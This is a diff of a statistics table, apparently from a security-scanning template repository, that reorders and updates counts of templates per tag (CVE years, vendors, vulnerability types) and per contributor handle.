| | | | | auth-bypass | 133 | lu4nx | 17 | | | | | | | | ssrf | 119 | bhutch | 17 | | | | | | | | phishing | 117 | 0xpugazh | 16 | | | | | | | | amazon | 117 | random-robbie | 16 | | | | | | | | cms | 113 | shaikhyaser | 16 | | | | | | | -| files | 113 | unapibageek | 15 | | | | | | | +| files | 113 | sheikhrishad | 15 | | | | | | | | cve2010 | 112 | pr3r00t | 15 | | | | | | | -| cve2017 | 110 | sheikhrishad | 15 | | | | | | | -| router | 108 | milo2012 | 14 | | | | | | | -| top-100 | 100 | dogasantos | 14 | | | | | | | -| aws-cloud-config | 90 | tenbird | 14 | | | | | | | -| disclosure | 89 | r3dg33k | 14 | | | | | | | +| cve2017 | 110 | unapibageek | 15 | | | | | | | +| router | 108 | dogasantos | 14 | | | | | | | +| top-100 | 100 | milo2012 | 14 | | | | | | | +| aws-cloud-config | 90 | r3dg33k | 14 | | | | | | | +| disclosure | 89 | tenbird | 14 | | | | | | | | linux | 85 | sharath | 13 | | | | | | | -| code | 81 | elsfa7110 | 13 | | | | | | | -| local | 80 | theabhinavgaur | 13 | | | | | | | -| cve2024 | 80 | nullfuzz | 13 | | | | | | | -| takeover | 79 | melbadry9 | 13 | | | | | | | -| seclists | 79 | 0ri2n | 13 | | | | | | | -| privesc | 79 | kazet | 12 | | | | | | | +| cve2024 | 81 | melbadry9 | 13 | | | | | | | +| code | 81 | 0ri2n | 13 | | | | | | | +| local | 80 | nullfuzz | 13 | | | | | | | +| seclists | 79 | theabhinavgaur | 13 | | | | | | | +| takeover | 79 | elsfa7110 | 13 | | | | | | | +| privesc | 79 | meme-lord | 12 | | | | | | | | tokens | 78 | suman_kar | 12 | | | | | | | -| fileupload | 76 | meme-lord | 12 | | | | | | | -| oracle | 73 | wdahlenb | 11 | | | | | | | -| oss | 68 | cyllective | 11 | | | | | | | -| cisco | 67 | hackergautam | 10 | | | | | | | -| js | 67 | random_robbie | 10 | | | | | | | -| enum | 65 | logicalhunter | 10 | | | | | | | -| adobe | 63 | alph4byt3 | 10 | | | | | | | -| ir | 61 | nadino | 10 | | | | | | | -| huntr | 60 | 0x240x23elu | 10 | | | | | | | -| cve2015 | 59 | co5mos | 10 | | | | | | | -| atlassian | 59 | emadshanab | 9 | | | | | | | -| cve2016 | 57 | fabaff | 9 | | | | | | | -| detection | 56 | initstring | 9 | | | | | | | -| vmware | 56 | olearycrew | 9 | | | | | | | -| google | 56 | momika233 | 9 | | | | | | | -| c2 | 55 | oppsec | 9 | | | | | | | -| tenable | 48 | adamcrosser | 9 | | | | | | | -| logs | 48 | veshraj | 8 | | | | | | | -| log4j | 47 | noraj | 8 | | | | | | | -| vulhub | 46 | _0xf4n9x_ | 8 | | | | | | | -| hackerone | 46 | that_juan_ | 8 | | | | | | | -| aem | 45 | zh | 8 | | | | | | | -| osint-gaming | 45 | aashiq | 8 | | | | | | | -| php | 44 | irshad ahamed | 8 | | | | | | | -| cve2014 | 44 | iamthefrogy | 8 | | | | | | | -| debug | 44 | randomstr1ng | 7 | | | | | | | -| jndi | 44 | me_dheeraj | 7 | | | | | | | -| | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| deserialization | 43 | tarunkoyalwar | 7 | | | | | | | -| generic | 43 | nodauf | 7 | | | | | | | -| plugin | 42 | techryptic (@tech) | 7 | | | | | | | -| osint-hobby | 42 | kophjager007 | 7 | | | | | | | -| oa | 42 | harshbothra_ | 7 | | | | | | | -| traversal | 42 | leovalcante | 7 | | | | | | | -| osint-porn | 42 | huta0 | 7 | | | | | | | +| fileupload | 76 | kazet | 12 | | | | | | | +| oracle | 73 | cyllective | 11 | | | | | | | +| oss | 68 | wdahlenb | 11 | | | | | | | +| js | 67 | logicalhunter | 10 | | | | | | | +| cisco | 67 | co5mos | 10 | | | | | | | +| enum | 65 | random_robbie | 10 | | | | | | | +| adobe | 63 | nadino | 10 | | | | | | | +| ir | 61 | 0x240x23elu | 10 | | | | | | | +| huntr | 60 | alph4byt3 | 10 | | | | | | | +| cve2015 | 59 | hackergautam | 10 | | | | | | | +| atlassian | 59 | fabaff | 9 | | | | | | | +| cve2016 | 57 | olearycrew | 9 | | | | | | | +| vmware | 56 | momika233 | 9 | | | | | | | +| google | 56 | oppsec | 9 | | | | | | | +| detection | 56 | adamcrosser | 9 | | | | | | | +| c2 | 55 | emadshanab | 9 | | | | | | | +| logs | 48 | initstring | 9 | | | | | | | +| tenable | 48 | aashiq | 8 | | | | | | | +| log4j | 47 | that_juan_ | 8 | | | | | | | +| hackerone | 46 | noraj | 8 | | | | | | | +| vulhub | 46 | irshad ahamed | 8 | | | | | | | +| osint-gaming | 45 | _0xf4n9x_ | 8 | | | | | | | +| aem | 45 | iamthefrogy | 8 | | | | | | | +| php | 45 | veshraj | 8 | | | | | | | +| jndi | 44 | zh | 8 | | | | | | | +| debug | 44 | divya_mudgal | 7 | | | | | | | +| cve2014 | 44 | harshbothra_ | 7 | | | | | | | +| generic | 43 | huta0 | 7 | | | | | | | +| deserialization | 43 | amit-jd | 7 | | | | | | | +| traversal | 42 | nodauf | 7 | | | | | | | +| osint-porn | 42 | dr_set | 7 | | | | | | | +| oa | 42 | tarunkoyalwar | 7 | | | | | | | +| osint-hobby | 42 | randomstr1ng | 7 | | | | | | | | microsoft | 42 | caspergn | 7 | | | | | | | -| cnvd | 41 | dr_set | 7 | | | | | | | -| springboot | 41 | amit-jd | 7 | | | | | | | -| misc | 40 | its0x08 | 7 | | | | | | | -| miscellaneous | 38 | divya_mudgal | 7 | | | | | | | -| injection | 38 | puzzlepeaches | 6 | | | | | | | -| jira | 37 | __fazal | 6 | | | | | | | +| plugin | 42 | me_dheeraj | 7 | | | | | | | +| | | (https://twitter.com/dheerajmadhukar) | | | | | | | | +| springboot | 41 | leovalcante | 7 | | | | | | | +| cnvd | 41 | kophjager007 | 7 | | | | | | | +| misc | 40 | techryptic (@tech) | 7 | | | | | | | +| miscellaneous | 38 | its0x08 | 7 | | | | | | | +| injection | 38 | forgedhallpass | 6 | | | | | | | +| jira | 37 | gitlab red team | 6 | | | | | | | +| listing | 37 | megamansec | 6 | | | | | | | | kubernetes | 37 | devang-solanki | 6 | | | | | | | -| listing | 37 | clem9669 | 6 | | | | | | | -| cti | 36 | forgedhallpass | 6 | | | | | | | -| ibm | 36 | praetorian-thendrickson | 6 | | | | | | | -| osint-misc | 35 | pathtaga | 6 | | | | | | | -| sap | 34 | justaacat | 6 | | | | | | | -| fuzz | 34 | hahwul | 6 | | | | | | | -| ssl | 33 | evan rubinstein | 6 | | | | | | | -| tls | 32 | megamansec | 6 | | | | | | | -| osint-tech | 31 | pentest_swissky | 6 | | | | | | | -| ec2 | 30 | lucky0x0d | 6 | | | | | | | -| osint-coding | 30 | gitlab red team | 6 | | | | | | | -| dlink | 30 | byt3bl33d3r | 6 | | | | | | | -| wp-theme | 30 | xelkomy | 6 | | | | | | | -| api | 28 | ja1sh | 6 | | | | | | | -| k8s | 28 | imnightmaree | 6 | | | | | | | -| gitlab | 28 | kh4sh3i | 5 | | | | | | | -| fortinet | 28 | gtrrnr | 5 | | | | | | | -| proxy | 27 | shine | 5 | | | | | | | -| citrix | 27 | podalirius | 5 | | | | | | | -| dns | 27 | defr0ggy | 5 | | | | | | | -| bestwebsoft | 27 | r12w4n | 5 | | | | | | | -| firewall | 26 | ganofins | 5 | | | | | | | -| cve2012 | 26 | robotshell | 5 | | | | | | | -| lfr | 26 | joanbono | 5 | | | | | | | -| ssh | 26 | arm!tage | 5 | | | | | | | -| zohocorp | 26 | andreluna | 5 | | | | | | | -| weaver | 25 | powerexploit | 5 | | | | | | | -| manageengine | 25 | panch0r3d | 5 | | | | | | | -| osint-shopping | 24 | your3cho | 5 | | | | | | | +| ibm | 36 | pathtaga | 6 | | | | | | | +| cti | 36 | hahwul | 6 | | | | | | | +| osint-misc | 35 | pentest_swissky | 6 | | | | | | | +| sap | 34 | xelkomy | 6 | | | | | | | +| fuzz | 34 | byt3bl33d3r | 6 | | | | | | | +| ssl | 33 | puzzlepeaches | 6 | | | | | | | +| tls | 32 | lucky0x0d | 6 | | | | | | | +| osint-tech | 31 | praetorian-thendrickson | 6 | | | | | | | +| dlink | 30 | imnightmaree | 6 | | | | | | | +| wp-theme | 30 | evan rubinstein | 6 | | | | | | | +| ec2 | 30 | justaacat | 6 | | | | | | | +| osint-coding | 30 | ja1sh | 6 | | | | | | | +| gitlab | 28 | __fazal | 6 | | | | | | | +| k8s | 28 | clem9669 | 6 | | | | | | | +| fortinet | 28 | r3naissance | 5 | | | | | | | +| api | 28 | r12w4n | 5 | | | | | | | +| dns | 27 | panch0r3d | 5 | | | | | | | +| citrix | 27 | yanyun | 5 | | | | | | | +| proxy | 27 | ganofins | 5 | | | | | | | +| bestwebsoft | 27 | robotshell | 5 | | | | | | | +| firewall | 26 | powerexploit | 5 | | | | | | | +| cve2012 | 26 | pulsesecurity.co.nz | 5 | | | | | | | +| ssh | 26 | andreluna | 5 | | | | | | | +| zohocorp | 26 | vicrack | 5 | | | | | | | +| lfr | 26 | kh4sh3i | 5 | | | | | | | +| manageengine | 25 | prajiteshsingh | 5 | | | | | | | +| weaver | 25 | podalirius | 5 | | | | | | | +| admin | 24 | defr0ggy | 5 | | | | | | | +| osint-shopping | 24 | gtrrnr | 5 | | | | | | | +| osint-finance | 24 | shine | 5 | | | | | | | +| osint-images | 24 | arm!tage | 5 | | | | | | | +| osint-business | 24 | joanbono | 5 | | | | | | | | zoho | 24 | s0obi | 5 | | | | | | | -| osint-finance | 24 | pulsesecurity.co.nz | 5 | | | | | | | -| admin | 24 | prajiteshsingh | 5 | | | | | | | -| osint-business | 24 | mr-xn | 5 | | | | | | | -| osint-images | 24 | yanyun | 5 | | | | | | | -| audit | 23 | r3naissance | 5 | | | | | | | -| xxe | 23 | vicrack | 5 | | | | | | | -| yonyou | 23 | cookiehanhoan | 4 | | | | | | | -| stored-xss | 23 | dolev farhi | 4 | | | | | | | -| file-upload | 23 | ggranjus | 4 | | | | | | | -| tomcat | 23 | ice3man543 | 4 | | | | | | | +| file-upload | 23 | your3cho | 5 | | | | | | | +| audit | 23 | mr-xn | 5 | | | | | | | +| stored-xss | 23 | shankar acharya | 4 | | | | | | | +| yonyou | 23 | iamnooob | 4 | | | | | | | +| xxe | 23 | tanq16 | 4 | | | | | | | +| tomcat | 23 | dadevel | 4 | | | | | | | +| github | 22 | ggranjus | 4 | | | | | | | | s3 | 22 | m4lwhere | 4 | | | | | | | -| github | 22 | king-alexander | 4 | | | | | | | -| prestashop | 22 | lum8rjack | 4 | | | | | | | -| cicd | 22 | shankar acharya | 4 | | | | | | | -| msf | 21 | h1ei1 | 4 | | | | | | | -| ecology | 21 | dadevel | 4 | | | | | | | -| printer | 21 | xxcdd | 4 | | | | | | | -| weblogic | 21 | 0xr2r | 4 | | | | | | | -| dast | 21 | nybble04 | 4 | | | | | | | -| jenkins | 20 | k0pak4 | 4 | | | | | | | -| camera | 20 | scent2d | 4 | | | | | | | -| ftp | 20 | flx | 4 | | | | | | | -| wavlink | 19 | wisnupramoedya | 4 | | | | | | | -| confluence | 19 | 3th1c_yuk1 | 4 | | | | | | | -| grafana | 19 | tanq16 | 4 | | | | | | | -| hp | 19 | heeress | 4 | | | | | | | -| rukovoditel | 19 | jpg0mez | 4 | | | | | | | -| struts | 19 | iamnooob | 4 | | | | | | | -| android | 18 | e_schultze_ | 4 | | | | | | | -| osint-music | 18 | incogbyte | 4 | | | | | | | -| vpn | 18 | shifacyclewala | 3 | | | | | | | -| coldfusion | 18 | xianke | 3 | | | | | | | -| ruijie | 18 | lucasljm2001 | 3 | | | | | | | -| node.js | 18 | jarijaas | 3 | | | | | | | -| cve2011 | 18 | ekrause | 3 | | | | | | | -| headless | 17 | vagnerd | 3 | | | | | | | -| honeypot | 17 | andydoering | 3 | | | | | | | -| nginx | 17 | dr0pd34d | 3 | | | | | | | -| microweber | 17 | true13 | 3 | | | | | | | -| azure | 17 | evergreencartoons | 3 | | | | | | | -| mail | 17 | fxploit | 3 | | | | | | | -| backup | 16 | vsh00t | 3 | | | | | | | -| rconfig | 16 | whoever | 3 | | | | | | | -| jarm | 16 | farish | 3 | | | | | | | -| service | 16 | _generic_human_ | 3 | | | | | | | -| magento | 16 | imjust0 | 3 | | | | | | | -| osint-blog | 16 | splint3r7 | 3 | | | | | | | -| backdoor | 16 | z3bd | 3 | | | | | | | -| status | 16 | dudez | 3 | | | | | | | -| alibaba | 16 | ph33r | 3 | | | | | | | -| cve2009 | 16 | matt galligan | 3 | | | | | | | -| setup | 15 | thomas_from_offensity | 3 | | | | | | | -| tongda | 15 | me9187 | 3 | | | | | | | -| netgear | 15 | parth | 3 | | | | | | | -| ruby | 15 | emenalf | 3 | | | | | | | -| cnvd2021 | 15 | johnjhacking | 3 | | | | | | | -| nagios | 15 | fyoorer | 3 | | | | | | | -| java | 15 | coldfish | 3 | | | | | | | -| ssti | 15 | salts | 3 | | | | | | | -| dashboard | 15 | omranisecurity | 3 | | | | | | | -| installer | 15 | alifathi-h1 | 3 | | | | | | | -| bypass | 15 | j3ssie | 3 | | | | | | | -| woocommerce | 15 | unstabl3 | 3 | | | | | | | -| cve2013 | 15 | mavericknerd | 3 | | | | | | | -| nodejs | 15 | yuzhe-zhang-0 | 3 | | | | | | | -| seeyon | 15 | e1a | 3 | | | | | | | -| redhat | 15 | f1tz | 3 | | | | | | | -| zyxel | 15 | atomiczsec | 3 | | | | | | | -| moosocial | 15 | isacaya | 3 | | | | | | | -| cve2008 | 15 | badboycxcc | 3 | | | | | | | -| node | 14 | davidmckennirey | 3 | | | | | | | -| login-check | 14 | skeltavik | 3 | | | | | | | -| domainmod | 14 | 0w4ys | 3 | | | | | | | -| git | 14 | taielab | 3 | | | | | | | -| creds-stuffing | 14 | bernardofsr | 3 | | | | | | | -| osint-art | 14 | randomrobbie | 3 | | | | | | | -| redis | 14 | arcc | 3 | | | | | | | -| npm | 14 | canberbamber | 3 | | | | | | | -| docker | 14 | impramodsargar | 3 | | | | | | | -| osint-health | 14 | aringo | 3 | | | | | | | -| icewarp | 14 | ambassify | 3 | | | | | | | -| info-leak | 14 | lark-lab | 3 | | | | | | | -| auth | 14 | swissky | 3 | | | | | | | -| ivanti | 14 | yash anand @yashanand155 | 3 | | | | | | | -| smtp | 14 | huowuzhao | 3 | | | | | | | -| rds | 14 | c4sper0 | 3 | | | | | | | -| dell | 14 | sushantkamble | 3 | | | | | | | -| jboss | 14 | cheesymoon | 3 | | | | | | | -| windows | 13 | binaryfigments | 3 | | | | | | | -| osint-dating | 13 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| mysql | 13 | vavkamil | 2 | | | | | | | -| rails | 13 | nvn1729 | 2 | | | | | | | -| cuppa | 13 | x1m_martijn | 2 | | | | | | | -| fortigate | 13 | topscoder | 2 | | | | | | | -| sonicwall | 13 | davidegirardi | 2 | | | | | | | -| fuzzing | 13 | lotusdll | 2 | | | | | | | -| cuppacms | 13 | supr4s | 2 | | | | | | | -| postgresql | 13 | mohammedsaneem | 2 | | | | | | | -| airflow | 13 | geekby | 2 | | | | | | | -| laravel | 13 | joeldeleep | 2 | | | | | | | -| osint-political | 13 | kre80r | 2 | | | | | | | -| abstractapi | 13 | mrharshvardhan | 2 | | | | | | | -| graphql | 13 | ehsahil | 2 | | | | | | | -| hashicorp | 13 | gevakun | 2 | | | | | | | -| netsweeper | 12 | sascha brendel | 2 | | | | | | | -| newrelic | 12 | moritz nentwig | 2 | | | | | | | -| jetbrains | 12 | bsysop | 2 | | | | | | | -| kafka | 12 | raesene | 2 | | | | | | | -| doppler | 12 | n-thumann | 2 | | | | | | | -| vbulletin | 12 | christianpoeschl | 2 | | | | | | | -| zimbra | 12 | joshlarsen | 2 | | | | | | | -| smb | 12 | z0ne | 2 | | | | | | | -| drupal | 12 | supras | 2 | | | | | | | -| phpgurukul | 12 | g4l1t0 | 2 | | | | | | | -| ofbiz | 12 | joshua rogers | 2 | | | | | | | -| webserver | 12 | ep1csage | 2 | | | | | | | -| xstream | 11 | gal nagli | 2 | | | | | | | -| django | 11 | socketz | 2 | | | | | | | -| dedecms | 11 | koti2 | 2 | | | | | | | -| osint-video | 11 | arliya | 2 | | | | | | | -| prometheus | 11 | h0j3n | 2 | | | | | | | -| online_fire_reporting_system_project | 11 | brenocss | 2 | | | | | | | -| glpi | 11 | martincodes-de | 2 | | | | | | | -| spring | 11 | dahse89 | 2 | | | | | | | -| hikvision | 11 | github.com/its0x08 | 2 | | | | | | | -| cache | 11 | nkxxkn | 2 | | | | | | | -| jolokia | 11 | thevillagehacker | 2 | | | | | | | -| iam | 11 | usdag | 2 | | | | | | | -| phpmyadmin | 11 | v0idc0de | 2 | | | | | | | -| fastjson | 11 | 0xelkomy | 2 | | | | | | | -| iis | 11 | danmcinerney | 2 | | | | | | | -| online-fire-reporting | 11 | lstatro | 2 | | | | | | | -| zabbix | 10 | sy3omda | 2 | | | | | | | -| symfony | 10 | charles d. | 2 | | | | | | | -| sitecore | 10 | udit_thakkur | 2 | | | | | | | -| xstream_project | 10 | uomogrande | 2 | | | | | | | -| db | 10 | sbani | 2 | | | | | | | -| dahua | 10 | nuk3s3c | 2 | | | | | | | -| digitalocean | 10 | afaq | 2 | | | | | | | -| elasticsearch | 10 | shankaracharya | 2 | | | | | | | -| thinkphp | 10 | thezakman | 2 | | | | | | | -| solarview | 10 | 6mile | 2 | | | | | | | -| samsung | 10 | thabisocn | 2 | | | | | | | -| crlf | 10 | bmcel | 2 | | | | | | | -| solr | 10 | ree4pwn | 2 | | | | | | | -| progress | 10 | ayadim | 2 | | | | | | | -| dropbox | 10 | paperpen | 2 | | | | | | | -| secret | 9 | dogancanbakir | 2 | | | | | | | -| cloudtrail | 9 | charles d | 2 | | | | | | | -| facebook | 9 | kishore-hariram | 2 | | | | | | | -| sangfor | 9 | y4er | 2 | | | | | | | -| vcenter | 9 | dheerajmadhukar | 2 | | | | | | | -| elastic | 9 | clarkvoss | 2 | | | | | | | -| pfsense | 9 | k11h-de | 2 | | | | | | | -| artica | 9 | zomsop82 | 2 | | | | | | | -| firebase | 9 | serrapa | 2 | | | | | | | -| moodle | 9 | d4vy | 2 | | | | | | | -| druid | 9 | cocxanh | 2 | | | | | | | -| python | 9 | shelled | 2 | | | | | | | -| versa | 9 | ajaysenr | 2 | | | | | | | -| joomla\! | 9 | amirhossein raeisi | 2 | | | | | | | -| kube | 9 | 0xsmiley | 2 | | | | | | | -| gateway | 9 | w4cky_ | 2 | | | | | | | -| exchange | 9 | liwermor | 2 | | | | | | | -| blind | 9 | 8arthur | 2 | | | | | | | -| f5 | 9 | foulenzer | 2 | | | | | | | -| console | 9 | myztique | 2 | | | | | | | -| cnvd2020 | 9 | florianmaak | 2 | | | | | | | -| wso2 | 9 | t3l3machus | 2 | | | | | | | -| bitbucket | 9 | thardt-praetorian | 2 | | | | | | | -| gitea | 9 | randomdhiraj | 2 | | | | | | | -| opencats | 9 | sinkettu | 2 | | | | | | | -| scada | 9 | herry | 2 | | | | | | | -| lucee | 9 | codexlynx | 2 | | | | | | | -| sophos | 9 | streetofhackerr007 | 2 | | | | | | | -| manager | 8 | egemenkochisarli | 2 | | | | | | | -| huawei | 8 | mzack9999 | 2 | | | | | | | -| hms | 8 | manas_harsh | 2 | | | | | | | -| nexus | 8 | hetroublemakr | 2 | | | | | | | -| odoo | 8 | pxmme1337 | 2 | | | | | | | -| mlflow | 8 | notnotnotveg | 2 | | | | | | | -| metadata | 8 | michal mikolas (nanuqcz) | 2 | | | | | | | -| symantec | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| lfprojects | 8 | securityforeveryone | 2 | | | | | | | -| phpinfo | 8 | bp0lr | 2 | | | | | | | -| unauthenticated | 8 | kiblyn11 | 2 | | | | | | | -| emerge | 8 | hackerarpan | 2 | | | | | | | -| ognl | 8 | 0xsapra | 2 | | | | | | | -| nagiosxi | 8 | amsda | 2 | | | | | | | -| openemr | 8 | danielmofer | 2 | | | | | | | -| oauth | 8 | israel comazzetto dos reis | 2 | | | | | | | -| phpjabbers | 8 | dbrwsky | 2 | | | | | | | -| cisco-switch | 8 | 0xcrypto | 2 | | | | | | | -| bucket | 8 | zy9ard3 | 2 | | | | | | | -| e-office | 8 | maximus decimus | 2 | | | | | | | -| osint-news | 8 | msegoviag | 2 | | | | | | | -| wanhu | 8 | wa1tf0rme | 2 | | | | | | | -| instrusive | 8 | paradessia | 2 | | | | | | | -| error | 8 | luci | 2 | | | | | | | -| go | 8 | 666asd | 2 | | | | | | | -| spotweb | 8 | redteambrasil | 2 | | | | | | | -| discord | 8 | rafaelwdornelas | 2 | | | | | | | -| spotweb_project | 8 | 0xnirvana | 2 | | | | | | | -| exploitdb | 8 | korteke | 2 | | | | | | | -| microfocus | 8 | pbuff07 | 2 | | | | | | | -| cloud-enum | 8 | bing0o | 2 | | | | | | | -| recon | 8 | c3l3si4n | 2 | | | | | | | -| default-page | 8 | cckuakilong | 2 | | | | | | | -| mirai | 8 | brucelsone | 2 | | | | | | | -| config-audit | 8 | convisoappsec | 2 | | | | | | | -| atom | 8 | ricardo maia (brainfork) | 2 | | | | | | | -| activemq | 7 | parzival | 2 | | | | | | | -| rfi | 7 | bananabr | 2 | | | | | | | -| filemanager | 7 | 0xrudra | 2 | | | | | | | -| solarwinds | 7 | colbyjack1134 | 1 | | | | | | | -| gogs | 7 | pry0cc | 1 | | | | | | | -| car_rental_management_system_project | 7 | jc175 | 1 | | | | | | | -| avtech | 7 | barthy.koeln | 1 | | | | | | | -| oos | 7 | phyr3wall | 1 | | | | | | | -| monstra | 7 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| fortios | 7 | michal-mikolas | 1 | | | | | | | -| linkedin | 7 | borna nematzadeh | 1 | | | | | | | -| landray | 7 | francescocarlucci | 1 | | | | | | | -| bigip | 7 | 0xprial | 1 | | | | | | | -| teamcity | 7 | andirrahmani1 | 1 | | | | | | | -| mongodb | 7 | ritesh_gohil(#l4stpl4y3r) | 1 | | | | | | | -| nortekcontrol | 7 | x6263 | 1 | | | | | | | -| database | 7 | kiransau | 1 | | | | | | | -| vms | 7 | houdinis | 1 | | | | | | | -| shopify | 7 | sshell | 1 | | | | | | | -| vpc | 7 | mordavid | 1 | | | | | | | -| telesquare | 7 | jas37 | 1 | | | | | | | -| nacos | 7 | b0rn2r00t | 1 | | | | | | | -| slack | 7 | sdcampbell | 1 | | | | | | | -| fpd | 7 | aayush vishnoi | 1 | | | | | | | -| mobileiron | 7 | olewagner | 1 | | | | | | | -| keking | 7 | hexcat | 1 | | | | | | | -| contec | 7 | danigoland | 1 | | | | | | | -| vrealize | 7 | w8ay | 1 | | | | | | | -| opensis | 7 | lrtk-coder | 1 | | | | | | | -| websphere | 7 | jeya seelan | 1 | | | | | | | -| twitter | 7 | andysvints | 1 | | | | | | | -| squirrelmail | 7 | luqmaan hadia | 1 | | | | | | | -| blockchain | 7 | toufik-airane | 1 | | | | | | | -| cacti | 7 | erethon | 1 | | | | | | | -| bloofox | 7 | h4kux | 1 | | | | | | | -| moodating | 7 | 8authur | 1 | | | | | | | -| ruckus | 7 | orpheus | 1 | | | | | | | -| pmb | 7 | xcapri | 1 | | | | | | | -| maps | 7 | anonymous | 1 | | | | | | | -| webmin | 6 | caon | 1 | | | | | | | -| plesk | 6 | tangxiaofeng7 | 1 | | | | | | | -| kubelet | 6 | kurohost | 1 | | | | | | | -| microstrategy | 6 | arqsz | 1 | | | | | | | -| beyondtrust | 6 | rojanrijal | 1 | | | | | | | -| sonarqube | 6 | jub0bs | 1 | | | | | | | -| doctor-appointment-system | 6 | lark lab | 1 | | | | | | | -| express | 6 | wabafet | 1 | | | | | | | -| synacor | 6 | noah @thesubtlety | 1 | | | | | | | -| magmi | 6 | ledoubletake | 1 | | | | | | | -| couchdb | 6 | noobexploiter | 1 | | | | | | | -| splunk | 6 | numan türle | 1 | | | | | | | -| minio | 6 | rinolock | 1 | | | | | | | -| keycloak | 6 | xeldax | 1 | | | | | | | -| cockpit | 6 | dabla | 1 | | | | | | | -| elfinder | 6 | danfaizer | 1 | | | | | | | -| sql | 6 | marcos_iaf | 1 | | | | | | | -| paypal | 6 | kishore krishna (sillydaddy) | 1 | | | | | | | -| liferay | 6 | 0xh7ml | 1 | | | | | | | -| bmc | 6 | zhenwarx | 1 | | | | | | | -| typo3 | 6 | vulnspace | 1 | | | | | | | -| advantech | 6 | yashgoti | 1 | | | | | | | -| chanjet | 6 | alex | 1 | | | | | | | -| gcp | 6 | ofjaaah | 1 | | | | | | | -| tikiwiki | 6 | harryha | 1 | | | | | | | -| jeecg | 6 | diablo | 1 | | | | | | | -| jamf | 6 | ptonewreckin | 1 | | | | | | | -| server | 6 | aaban solutions | 1 | | | | | | | -| log | 6 | denandz | 1 | | | | | | | -| jetty | 6 | lamscun | 1 | | | | | | | -| cobbler | 6 | undefl0w | 1 | | | | | | | -| flutterwave | 6 | jacalynli | 1 | | | | | | | -| ldap | 6 | y0no | 1 | | | | | | | -| openvpn | 6 | unblvr1 | 1 | | | | | | | -| geoserver | 6 | sinsinology | 1 | | | | | | | -| doctor_appointment_system_project | 6 | k3rwin | 1 | | | | | | | -| servicenow | 6 | domenicoveneziano | 1 | | | | | | | -| paloaltonetworks | 6 | shreyapohekar | 1 | | | | | | | -| 74cms | 6 | qianbenhyu | 1 | | | | | | | -| asp | 6 | none | 1 | | | | | | | -| rat | 6 | nuts7 | 1 | | | | | | | -| zhiyuan | 6 | piyushchhiroliya | 1 | | | | | | | -| leak | 6 | pepitoh | 1 | | | | | | | -| asus | 6 | yuansec | 1 | | | | | | | -| xmlrpc | 5 | viondexd | 1 | | | | | | | -| swagger | 5 | vzamanillo | 1 | | | | | | | -| circarlife | 5 | jbaines-r7 | 1 | | | | | | | -| qnap | 5 | momen eldawakhly | 1 | | | | | | | -| web3 | 5 | bywalks | 1 | | | | | | | -| awstats | 5 | evan rubinstien | 1 | | | | | | | -| kkfileview | 5 | adilsoybali | 1 | | | | | | | -| tibco | 5 | push4d | 1 | | | | | | | -| carrental | 5 | tirtha | 1 | | | | | | | -| papercut | 5 | savik | 1 | | | | | | | -| 10web | 5 | babybash | 1 | | | | | | | -| craftcms | 5 | retr0 | 1 | | | | | | | -| genetechsolutions | 5 | ramkrishna sawant | 1 | | | | | | | -| goanywhere | 5 | thirukrishnan | 1 | | | | | | | -| webkul | 5 | invisiblethreat | 1 | | | | | | | -| zzzcms | 5 | exploitation | 1 | | | | | | | -| hpe | 5 | knassar702 | 1 | | | | | | | -| akamai | 5 | 0xteles | 1 | | | | | | | -| chamilo | 5 | sec_hawk | 1 | | | | | | | -| metinfo | 5 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| hybris | 5 | carlosvieira | 1 | | | | | | | -| openai | 5 | dhiyanesdk | 1 | | | | | | | -| storage | 5 | af001 | 1 | | | | | | | -| terramaster | 5 | wlayzz | 1 | | | | | | | -| ems | 5 | dk999 | 1 | | | | | | | -| redmine | 5 | blckraven | 1 | | | | | | | -| dionaea | 5 | amnotacat | 1 | | | | | | | -| openfire | 5 | shifacyclewla | 1 | | | | | | | -| nuuo | 5 | official_blackhat13 | 1 | | | | | | | -| schneider-electric | 5 | rschio | 1 | | | | | | | -| telerik | 5 | mukundbhuva | 1 | | | | | | | -| adminer | 5 | realexp3rt | 1 | | | | | | | -| cloudflare | 5 | mayankpandey01 | 1 | | | | | | | -| cve2007 | 5 | ling | 1 | | | | | | | -| graylog | 5 | compr00t | 1 | | | | | | | -| connectwise | 5 | ringo | 1 | | | | | | | -| pyload | 5 | adrianmf | 1 | | | | | | | -| adb | 5 | furkansayim | 1 | | | | | | | -| hoteldruid | 5 | watchtowr | 1 | | | | | | | -| decision-center | 5 | guax1 | 1 | | | | | | | -| sentry | 5 | hczdmr | 1 | | | | | | | -| jupyter | 5 | th3.d1p4k | 1 | | | | | | | -| gnu | 5 | hakluke | 1 | | | | | | | -| react | 5 | thebinitghimire | 1 | | | | | | | -| avaya | 5 | phillipo | 1 | | | | | | | -| openstack | 5 | paper-pen | 1 | | | | | | | -| caucho | 5 | 0xrod | 1 | | | | | | | -| circontrol | 5 | pratik khalane | 1 | | | | | | | -| checkpoint | 5 | husain | 1 | | | | | | | -| froxlor | 5 | schniggie | 1 | | | | | | | -| digitaldruid | 5 | absshax | 1 | | | | | | | -| magmi_project | 5 | brianlam38 | 1 | | | | | | | -| strapi | 5 | willd96 | 1 | | | | | | | -| crushftp | 5 | remonsec | 1 | | | | | | | -| cdata | 5 | kresec | 1 | | | | | | | -| vehicle_service_management_system_project | 5 | nobody | 1 | | | | | | | -| voip | 5 | petruknisme | 1 | | | | | | | -| elementor | 5 | secthebit | 1 | | | | | | | -| fatpipe | 5 | imhunterand | 1 | | | | | | | -| wpdevart | 5 | bughuntersurya | 1 | | | | | | | -| mikrotik | 5 | dwbzn | 1 | | | | | | | -| jabber | 5 | juicypotato1 | 1 | | | | | | | -| qdpm | 5 | pussycat0 | 1 | | | | | | | -| acm | 5 | jfbes | 1 | | | | | | | -| agentejo | 5 | r3s ost | 1 | | | | | | | -| firmware | 5 | metascan | 1 | | | | | | | -| square | 5 | hyunsoo-ds | 1 | | | | | | | -| percha | 5 | ooooooo_q | 1 | | | | | | | -| wbce | 5 | mabdullah22 | 1 | | | | | | | -| rseenet | 5 | affix | 1 | | | | | | | -| cnvd2023 | 5 | exceed | 1 | | | | | | | -| tenda | 5 | nielsing | 1 | | | | | | | -| totolink | 5 | intx0x80 | 1 | | | | | | | -| open-emr | 5 | arr0way | 1 | | | | | | | -| ethereum | 5 | juliosmelo | 1 | | | | | | | -| webview | 5 | fq_hsu | 1 | | | | | | | 